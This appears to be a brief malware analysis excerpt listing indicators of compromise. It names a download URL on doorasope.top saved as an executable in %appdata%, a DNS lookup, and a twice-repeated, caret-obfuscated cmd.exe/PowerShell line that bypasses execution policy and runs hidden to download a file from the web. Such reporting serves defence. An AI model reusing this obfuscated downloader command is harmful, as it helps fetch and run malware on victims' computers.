Technical information
- http://www.doorasope.top/read.php?f=1.gif as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^OweR^sh^E^LL^.E^XE -Execut^IO^n^p^o^L^iC^y bYpass ^-^N^OPro^fI^Le -W^i^n^dO^wsT^yLe^ h^id^DEN ^(NEW^-Ob^Je^CT S^YStem.^N^ET.^W^EbC^lIE^nt)^.D^OWN^LO^A^d^f^il^e^(^'http://...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "p^OweR^sh^E^LL^.E^XE -Execut^IO^n^p^o^L^iC^y bYpass ^-^N^OPro^fI^Le -W^i^n^dO^wsT^yLe^ h^id^DEN ^(NEW^-Ob^Je^CT S^YStem.^N^ET.^W^EbC^lIE^nt)^.D^OWN^LO^A^d^f^il^e^(^'http://...' (with a hidden window)